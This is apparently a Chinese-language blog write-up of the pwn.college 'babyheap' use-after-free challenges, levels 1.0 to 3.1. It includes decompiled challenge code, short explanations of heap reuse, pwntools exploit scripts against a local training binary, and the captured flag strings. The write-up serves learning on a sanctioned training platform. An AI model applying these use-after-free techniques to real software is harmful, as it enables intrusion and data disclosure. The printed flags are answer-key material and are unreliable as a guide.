Write-ups: Program Security (Dynamic Allocator Misuse) series

更新于 Jan 25, 2025 | 10:44 PM # Pwn # Write-ups # Heap

Open Table of contents

前言
Level 1.0
- Information
- Description
- Write-up
- Exploit
- Flag
Level 1.1
- Information
- Description
- Write-up
- Exploit
- Flag
Level 2.0
- Information
- Description
- Write-up
- Exploit
- Flag
Level 2.1
- Information
- Description
- Write-up
- Exploit
- Flag
Level 3.0
- Information
- Description
- Write-up
- Exploit
- Flag
Level 3.1
- Information
- Description
- Write-up
- Exploit
- Flag

前言

为了 2.9 的 Nu1L Junior 招新赛被迫先学点 Heap 的知识，本来是打算学完 FmtStr 和 Sandbox 再开这章的……想想还是得先开点堆的知识，因为栈我能临场自学，但堆是一点也不会啊。

看完讲义后，我果然没猜错，刚接触 Heap 是有点难度，一开始就要先被一堆新知识狠狠的冲击，要垮啦……打完 Pwn College 的 Heap 应该只能算有点基础知识，还得刷别的题，看 glibc 源码，要崩啦……

想想如果能成为 Heap ✌️ 得有多牛逼吧 LMAO

Level 1.0

Description

Exploit a use-after-free vulnerability to get the flag.

Write-up


19 collapsed lines
1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  int v3; // ecx
4
  int i; // [rsp+2Ch] [rbp-B4h]
5
  unsigned int size; // [rsp+34h] [rbp-ACh]
6
  void *size_4; // [rsp+38h] [rbp-A8h]
7
  void *ptr; // [rsp+48h] [rbp-98h]
8
  char s1[136]; // [rsp+50h] [rbp-90h] BYREF
9
  unsigned __int64 v10; // [rsp+D8h] [rbp-8h]
10

11
  v10 = __readfsqword(0x28u);
12
  setvbuf(stdin, 0LL, 2, 0LL);
13
  setvbuf(_bss_start, 0LL, 2, 1uLL);
14
  puts("###");
15
  printf("### Welcome to %s!\n", *argv);
16
  puts("###");
17
  putchar(10);
18
  ptr = 0LL;
19
  puts(
20
    "This challenge allows you to perform various heap operations, some of which may involve the flag. Through this series of");
21
  puts("challenges, you will become familiar with the concept of heap exploitation.\n");
22
  printf("This challenge can manage up to %d unique allocations.\n\n", 1);
23
  while ( 1 )
24
  {
25
    while ( 1 )
26
    {
27
      while ( 1 )
28
      {
29
        while ( 1 )
30
        {
31
          print_tcache(main_thread_tcache);
32
          puts(byte_2419);
33
          printf("[*] Function (malloc/free/puts/read_flag/quit): ");
34
          __isoc99_scanf("%127s", s1);
35
          puts(byte_2419);
36
          if ( strcmp(s1, "malloc") )
37
            break;
38
          printf("Size: ");
39
          __isoc99_scanf("%127s", s1);
40
          puts(byte_2419);
41
          size = atoi(s1);
42
          printf("[*] allocations[%d] = malloc(%d)\n", 0, size);
43
          ptr = malloc(size);
44
          printf("[*] allocations[%d] = %p\n", 0, ptr);
45
        }
46
        if ( strcmp(s1, "free") )
47
          break;
48
        printf("[*] free(allocations[%d])\n", 0);
49
        free(ptr);
50
      }
51
      if ( strcmp(s1, "puts") )
52
        break;
53
      printf("[*] puts(allocations[%d])\n", 0);
54
      printf("Data: ");
55
      puts((const char *)ptr);
56
    }
57
    if ( strcmp(s1, "read_flag") )
58
      break;
59
    for ( i = 0; i <= 0; ++i )
60
    {
61
      printf("[*] flag_buffer = malloc(%d)\n", 330);
62
      size_4 = malloc(0x14AuLL);
63
      printf("[*] flag_buffer = %p\n", size_4);
64
    }
65
    v3 = open("/flag", 0);
66
    read(v3, size_4, 0x80uLL);
67
    puts("[*] read the flag!");
68
  }
69
  if ( strcmp(s1, "quit") )
70
    puts("Unrecognized choice!");
71
  puts("### Goodbye!");
72
  return 0;
73
}

atoi，即 ASCII to Integer.

这题就是一个菜单程序，存在一个 UAF (Use After Free) 漏洞，简单来说就是在释放了一块内存后使用了指向已经被释放的内存的指针，这很容易造成的一个问题就是 Data disclosure.

简单分析这个程序我们发现，read_flag 会 malloc 一块空间，然后把 flag 写进去；puts 会输出 ptr 处的内容。我们的目的是输出 flag，那这个 ptr 就必须指向 flag 的起始地址才行。再观察 malloc，它会将分配后返回的地址赋值给 ptr。那思路就很清晰了：我们先使用 malloc 分配足够存下 flag 的内存，这会设置 ptr，之后 free 它，接着使用 read_flag，这会把 flag 写入 malloc 返回的地址处（同 ptr 保存的地址），最后调用 puts 就可以输出我们的 flag 了。

Exploit

1
#!/usr/bin/python3
2

3
from pwn import (
4
    ELF,
5
    context,
6
    gdb,
7
    log,
8
    process,
9
    remote,
10
)
11

12
context(log_level="debug", terminal="kitty")
13

14
FILE = "./babyheap_level1.0"
15
HOST, PORT = "localhost", 1337
16

17
gdbscript = """
18
c
19
"""
20

21

22
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
23
    if local:
24
        elf = ELF(FILE)
25
        context.binary = elf
26

27
        if debug:
28
            return gdb.debug(
29
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
30
            )
31
        else:
32
            return process([elf.path] + (argv or []), env=envp)
33
    else:
34
        return remote(HOST, PORT)
35

36

37
def construct_payload():
38
    return [
39
        (b"malloc", b"1337"),
40
        (b"free", None),
41
        (b"read_flag", None),
42
        (b"puts", None),
43
    ]
44

45

46
def attack(target, payload):
47
    try:
48
        for cmd, arg in payload:
49
            target.sendlineafter(b": ", cmd)
50

51
            if arg is not None:
52
                target.sendlineafter(b": ", arg)
53

54
        response = target.recvall(timeout=0.1)
55

56
        if b"pwn.college{" in response:
57
            return True
58
    except Exception as e:
59
        log.exception(f"An error occurred while performing attack: {e}")
60

61

62
def main():
63
    target = launch()
64
    payload = construct_payload()
65

66
    if attack(target, payload):
67
        exit()
68

69

70
if __name__ == "__main__":
71
    main()

Flag

Flag: pwn.college{8_UCfYUIGnvHU86NU1Qe-H6dK1o.0VM3MDL5cTNxgzW}

Level 1.1

Information

Category: Pwn

Description

Exploit a use-after-free vulnerability to get the flag.

Write-up

参见 Level 1.0。

Exploit

1
#!/usr/bin/python3
2

3
from pwn import (
4
    ELF,
5
    context,
6
    gdb,
7
    log,
8
    process,
9
    remote,
10
)
11

12
context(log_level="debug", terminal="kitty")
13

14
FILE = "./babyheap_level1.1"
15
HOST, PORT = "localhost", 1337
16

17
gdbscript = """
18
c
19
"""
20

21

22
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
23
    if local:
24
        elf = ELF(FILE)
25
        context.binary = elf
26

27
        if debug:
28
            return gdb.debug(
29
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
30
            )
31
        else:
32
            return process([elf.path] + (argv or []), env=envp)
33
    else:
34
        return remote(HOST, PORT)
35

36

37
def construct_payload():
38
    return [
39
        (b"malloc", b"1337"),
40
        (b"free", None),
41
        (b"read_flag", None),
42
        (b"puts", None),
43
    ]
44

45

46
def attack(target, payload):
47
    try:
48
        for cmd, arg in payload:
49
            target.sendlineafter(b": ", cmd)
50

51
            if arg is not None:
52
                target.sendlineafter(b": ", arg)
53

54
        response = target.recvall(timeout=0.1)
55

56
        if b"pwn.college{" in response:
57
            return True
58
    except Exception as e:
59
        log.exception(f"An error occurred while performing attack: {e}")
60

61

62
def main():
63
    target = launch()
64
    payload = construct_payload()
65

66
    if attack(target, payload):
67
        exit()
68

69

70
if __name__ == "__main__":
71
    main()

Flag

Flag: pwn.college{8oPO3KqdZU5lZfzl5xftjR2IZif.0lM3MDL5cTNxgzW}

Level 2.0

Information

Category: Pwn

Description

Create and exploit a use-after-free vulnerability to get the flag.

Write-up

与 Level 1 区别不大。

Exploit

1
#!/usr/bin/python3
2

3
from pwn import (
4
    ELF,
5
    context,
6
    gdb,
7
    log,
8
    process,
9
    remote,
10
)
11

12
context(log_level="debug", terminal="kitty")
13

14
FILE = "./babyheap_level2.0"
15
HOST, PORT = "localhost", 1337
16

17
gdbscript = """
18
c
19
"""
20

21

22
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
23
    if local:
24
        elf = ELF(FILE)
25
        context.binary = elf
26

27
        if debug:
28
            return gdb.debug(
29
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
30
            )
31
        else:
32
            return process([elf.path] + (argv or []), env=envp)
33
    else:
34
        return remote(HOST, PORT)
35

36

37
def construct_payload():
38
    return [
39
        (b"malloc", b"1337"),
40
        (b"free", None),
41
        (b"read_flag", None),
42
        (b"puts", None),
43
    ]
44

45

46
def attack(target, payload):
47
    try:
48
        for cmd, arg in payload:
49
            target.sendlineafter(b": ", cmd)
50

51
            if arg is not None:
52
                target.sendlineafter(b": ", arg)
53

54
        response = target.recvall(timeout=0.1)
55

56
        if b"pwn.college{" in response:
57
            return True
58
    except Exception as e:
59
        log.exception(f"An error occurred while performing attack: {e}")
60

61

62
def main():
63
    target = launch()
64
    payload = construct_payload()
65

66
    if attack(target, payload):
67
        exit()
68

69

70
if __name__ == "__main__":
71
    main()

Flag

Flag: pwn.college{ME7LG_Jy8T-xEw9H_njxpD2aJ4z.01M3MDL5cTNxgzW}

Level 2.1

Information

Category: Pwn

Description

Create and exploit a use-after-free vulnerability to get the flag.

Write-up

参见 Level 2.0。

Exploit

1
#!/usr/bin/python3
2

3
from pwn import (
4
    ELF,
5
    context,
6
    gdb,
7
    log,
8
    process,
9
    remote,
10
)
11

12
context(log_level="debug", terminal="kitty")
13

14
FILE = "./babyheap_level2.1"
15
HOST, PORT = "localhost", 1337
16

17
gdbscript = """
18
c
19
"""
20

21

22
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
23
    if local:
24
        elf = ELF(FILE)
25
        context.binary = elf
26

27
        if debug:
28
            return gdb.debug(
29
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
30
            )
31
        else:
32
            return process([elf.path] + (argv or []), env=envp)
33
    else:
34
        return remote(HOST, PORT)
35

36

37
def construct_payload():
38
    return [
39
        (b"malloc", b"1337"),
40
        (b"free", None),
41
        (b"read_flag", None),
42
        (b"puts", None),
43
    ]
44

45

46
def attack(target, payload):
47
    try:
48
        for cmd, arg in payload:
49
            target.sendlineafter(b": ", cmd)
50

51
            if arg is not None:
52
                target.sendlineafter(b": ", arg)
53

54
        response = target.recvall(timeout=0.1)
55

56
        if b"pwn.college{" in response:
57
            return True
58
    except Exception as e:
59
        log.exception(f"An error occurred while performing attack: {e}")
60

61

62
def main():
63
    target = launch()
64
    payload = construct_payload()
65

66
    if attack(target, payload):
67
        exit()
68

69

70
if __name__ == "__main__":
71
    main()

Flag

Flag: pwn.college{MihEcPIR1bQBmiQGOoGELSrscgW.0FN3MDL5cTNxgzW}

Level 3.0

Information

Category: Pwn

Description

Create and exploit a use-after-free vulnerability to get the flag when multiple allocations occur.

Write-up


23 collapsed lines
1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  int v3; // ecx
4
  int i; // [rsp+24h] [rbp-12Ch]
5
  unsigned int v6; // [rsp+28h] [rbp-128h]
6
  unsigned int v7; // [rsp+28h] [rbp-128h]
7
  unsigned int v8; // [rsp+28h] [rbp-128h]
8
  unsigned int size; // [rsp+2Ch] [rbp-124h]
9
  void *size_4; // [rsp+30h] [rbp-120h]
10
  void *ptr[16]; // [rsp+40h] [rbp-110h] BYREF
11
  char s1[136]; // [rsp+C0h] [rbp-90h] BYREF
12
  unsigned __int64 v13; // [rsp+148h] [rbp-8h]
13

14
  v13 = __readfsqword(0x28u);
15
  setvbuf(stdin, 0LL, 2, 0LL);
16
  setvbuf(_bss_start, 0LL, 2, 1uLL);
17
  puts("###");
18
  printf("### Welcome to %s!\n", *argv);
19
  puts("###");
20
  putchar(10);
21
  memset(ptr, 0, sizeof(ptr));
22
  puts(
23
    "This challenge allows you to perform various heap operations, some of which may involve the flag. Through this series of");
24
  puts("challenges, you will become familiar with the concept of heap exploitation.\n");
25
  printf("This challenge can manage up to %d unique allocations.\n\n", 16);
26
  printf("In this challenge, the flag buffer is allocated %d times before it is used.\n\n", 2);
27
  while ( 1 )
28
  {
29
    while ( 1 )
30
    {
31
      while ( 1 )
32
      {
33
        while ( 1 )
34
        {
35
          print_tcache(main_thread_tcache);
36
          puts(byte_246E);
37
          printf("[*] Function (malloc/free/puts/read_flag/quit): ");
38
          __isoc99_scanf("%127s", s1);
39
          puts(byte_246E);
40
          if ( strcmp(s1, "malloc") )
41
            break;
42
          printf("Index: ");
43
          __isoc99_scanf("%127s", s1);
44
          puts(byte_246E);
45
          v6 = atoi(s1);
46
          if ( v6 > 0xF )
47
            __assert_fail("allocation_index < 16", "<stdin>", 0xE0u, "main");
48
          printf("Size: ");
49
          __isoc99_scanf("%127s", s1);
50
          puts(byte_246E);
51
          size = atoi(s1);
52
          printf("[*] allocations[%d] = malloc(%d)\n", v6, size);
53
          ptr[v6] = malloc(size);
54
          printf("[*] allocations[%d] = %p\n", v6, ptr[v6]);
55
        }
56
        if ( strcmp(s1, "free") )
57
          break;
58
        printf("Index: ");
59
        __isoc99_scanf("%127s", s1);
60
        puts(byte_246E);
61
        v7 = atoi(s1);
62
        if ( v7 > 0xF )
63
          __assert_fail("allocation_index < 16", "<stdin>", 0xF2u, "main");
64
        printf("[*] free(allocations[%d])\n", v7);
65
        free(ptr[v7]);
66
      }
67
      if ( strcmp(s1, "puts") )
68
        break;
69
      printf("Index: ");
70
      __isoc99_scanf("%127s", s1);
71
      puts(byte_246E);
72
      v8 = atoi(s1);
73
      if ( v8 > 0xF )
74
        __assert_fail("allocation_index < 16", "<stdin>", 0xFFu, "main");
75
      printf("[*] puts(allocations[%d])\n", v8);
76
      printf("Data: ");
77
      puts((const char *)ptr[v8]);
78
    }
79
    if ( strcmp(s1, "read_flag") )
80
      break;
81
    for ( i = 0; i <= 1; ++i )
82
    {
83
      printf("[*] flag_buffer = malloc(%d)\n", 773);
84
      size_4 = malloc(0x305uLL);
85
      printf("[*] flag_buffer = %p\n", size_4);
86
    }
87
    v3 = open("/flag", 0);
88
    read(v3, size_4, 0x80uLL);
89
    puts("[*] read the flag!");
90
  }
91
  if ( strcmp(s1, "quit") )
92
    puts("Unrecognized choice!");
93
  puts("### Goodbye!");
94
  return 0;
95
}

这题的问题就在于标绿部分，把 flag 写入到 size_4 前会先进行两次 malloc。所以我们应该先 malloc 出对应的两个块，然后 free 掉，这么做是为了令标绿部分的 malloc 分配空间到我们的数组中而不是别的地方，因为 puts 只能输出数组中的内容。之后再次调用 malloc 会从最近 free 掉的那个地址开始分配，如果我们想让 flag 出现在 idx 0 的话我们的 free 顺序应该是先 free 0 再 free 1，之后再调用 read_flag 就会把 flag 写入 idx 0，我们用 puts 输出 idx 0 的内容即可。

Exploit

1
#!/usr/bin/python3
2

3
from pwn import (
4
    ELF,
5
    context,
6
    gdb,
7
    log,
8
    process,
9
    remote,
10
)
11

12
context(log_level="debug", terminal="kitty")
13

14
FILE = "./babyheap_level3.0"
15
HOST, PORT = "localhost", 1337
16

17
gdbscript = """
18
c
19
"""
20

21

22
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
23
    if local:
24
        elf = ELF(FILE)
25
        context.binary = elf
26

27
        if debug:
28
            return gdb.debug(
29
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
30
            )
31
        else:
32
            return process([elf.path] + (argv or []), env=envp)
33
    else:
34
        return remote(HOST, PORT)
35

36

37
def construct_payload():
38
    return [
39
        (b"malloc", b"0", b"773"),
40
        (b"malloc", b"1", b"773"),
41
        (b"free", b"0", None),
42
        (b"free", b"1", None),
43
        (b"read_flag", None, None),
44
        (b"puts", b"0", None),
45
    ]
46

47

48
def execute_cmd(target, cmd, arg1=None, arg2=None):
49
    target.sendlineafter(b": ", cmd)
50

51
    if arg1 is not None:
52
        target.sendlineafter(b": ", arg1)
53

54
    if arg2 is not None:
55
        target.sendlineafter(b": ", arg2)
56

57

58
def attack(target, payload):
59
    try:
60
        for cmd, arg1, arg2 in payload:
61
            execute_cmd(target, cmd, arg1, arg2)
62

63
        response = target.recvall(timeout=0.1)
64

65
        if b"pwn.college{" in response:
66
            return True
67
    except Exception as e:
68
        log.exception(f"An error occurred while performing attack: {e}")
69

70

71
def main():
72
    target = launch()
73
    payload = construct_payload()
74

75
    if attack(target, payload):
76
        exit()
77

78

79
if __name__ == "__main__":
80
    main()

Category: Pwn

Description

Create and exploit a use-after-free vulnerability to get the flag when multiple allocations occur.

Write-up

参见 Level 3.0。

Exploit

1
#!/usr/bin/python3
2

3
from pwn import (
4
    ELF,
5
    context,
6
    gdb,
7
    log,
8
    process,
9
    remote,
10
)
11

12
context(log_level="debug", terminal="kitty")
13

14
FILE = "./babyheap_level3.1"
15
HOST, PORT = "localhost", 1337
16

17
gdbscript = """
18
c
19
"""
20

21

22
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
23
    if local:
24
        elf = ELF(FILE)
25
        context.binary = elf
26

27
        if debug:
28
            return gdb.debug(
29
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
30
            )
31
        else:
32
            return process([elf.path] + (argv or []), env=envp)
33
    else:
34
        return remote(HOST, PORT)
35

36

37
def construct_payload():
38
    return [
39
        (b"malloc", b"0", b"911"),
40
        (b"malloc", b"1", b"911"),
41
        (b"free", b"0", None),
42
        (b"free", b"1", None),
43
        (b"read_flag", None, None),
44
        (b"puts", b"0", None),
45
    ]
46

47

48
def execute_cmd(target, cmd, arg1=None, arg2=None):
49
    target.sendlineafter(b": ", cmd)
50

51
    if arg1 is not None:
52
        target.sendlineafter(b": ", arg1)
53

54
    if arg2 is not None:
55
        target.sendlineafter(b": ", arg2)
56

57

58
def attack(target, payload):
59
    try:
60
        for cmd, arg1, arg2 in payload:
61
            execute_cmd(target, cmd, arg1, arg2)
62

63
        response = target.recvall(timeout=0.1)
64

65
        if b"pwn.college{" in response:
66
            return True
67
    except Exception as e:
68
        log.exception(f"An error occurred while performing attack: {e}")
69

70

71
def main():
72
    target = launch()
73
    payload = construct_payload()
74

75
    if attack(target, payload):
76
        exit()
77

78

79
if __name__ == "__main__":
80
    main()

Flag

Flag: pwn.college{wDLulwEpEQfpi78_Z4CAniTrByQ.0lN3MDL5cTNxgzW}